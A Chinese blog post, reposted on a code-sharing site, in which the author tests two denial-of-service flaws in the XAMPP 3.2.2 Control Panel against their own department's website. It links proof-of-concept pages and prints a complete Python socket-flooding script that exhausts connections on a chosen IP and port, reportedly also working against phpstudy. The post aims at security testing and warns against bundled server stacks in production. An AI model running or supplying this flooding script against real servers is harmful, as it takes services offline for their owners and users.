码迷,mamicode.com
首页 > 其他好文 > 详细

xampp拒绝服务漏洞

时间:2018-12-24 12:34:44      阅读:516      评论:0      收藏:0      [点我收藏+]

标签:文件   rcu   get   问题   target   error   \n   mys   filezilla   

  最近在看通用漏洞,发现我们部门网站使用了xampp3.2.2做网站部署,于是在网上搜索xampp,还真找到两个漏洞。

  一个是今年9月出的一个XAMPP Control Panel 3.2.2 Buffer Overflow;另一个是几年前的一个远程拒绝服务,发现竟然还能用(?_?)。

#0x01 XAMPP Control Panel 3.2.2 Buffer Overflow

  网上共找到两种Poc:

  http://www.vfocus.net/art/20181220/15036.html

  http://www.vfocus.net/art/20180917/14798.html

  下载运行脚本,会生成一个exploit.txt文件。

  在Control Panel里点击右上角的config,将exlpoit里的内容复制到editor和browser里,保存。

技术分享图片

然后点击查看httpd.conf文件,会弹出崩溃。

技术分享图片

崩溃后web进程并没有中断,并没有达成拒绝服务,只是程序崩溃而已,貌似价值不高。

#0x02XAMPP Control Panel - Denial Of Service

  找到一个poc:

  https://www.anquanke.com/vul/id/1067740

  大体意思就是在xampp监听的这些端口:

(MySQL) 3306 v3.2.2
(Tomcat) 8080 (XAMPP v3.1.0)
(FileZilla) 21
(Mercury Mail) 25 (XAMPP v3.1.0),79,105,106,143.

  如果发送大量的垃圾数据,就会造成内存崩溃和拒绝服务。

POC:

import socket

print "XAMPP Control Panel DOS"
print "Discovery: John Page (hyp3rlinx)"
print "ApparitionSec"
print "hyp3rlinx.altervista.org\r\n"

IP = raw_input("[IP]> ")
PORT = raw_input("[PORT]> ")

arr=[]
c=0
while 1:
    try:
        arr.append(socket.create_connection((IP,PORT)))
        arr[c].send("DOOM")
        print "Die!"
        c+=1
    except socket.error:
        print "[+] Done! "
        raw_input()
        break

对xampp的80端口尝试攻击:

技术分享图片

效果显著。中断脚本后,网站即可恢复。

想到其他建站工具也可能有这种问题,又拿脚本测了下phpstudy,同样可以实现拒绝服务。

#0x03 

  怪不得都说网站正式部署最好不要用这些集成工具包,一个是很容易由于默认配置遭到入侵,还有这种dos攻击。

 

xampp拒绝服务漏洞

标签:文件   rcu   get   问题   target   error   \n   mys   filezilla   

原文地址:https://www.cnblogs.com/apossin/p/10167920.html

(0)
(1)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!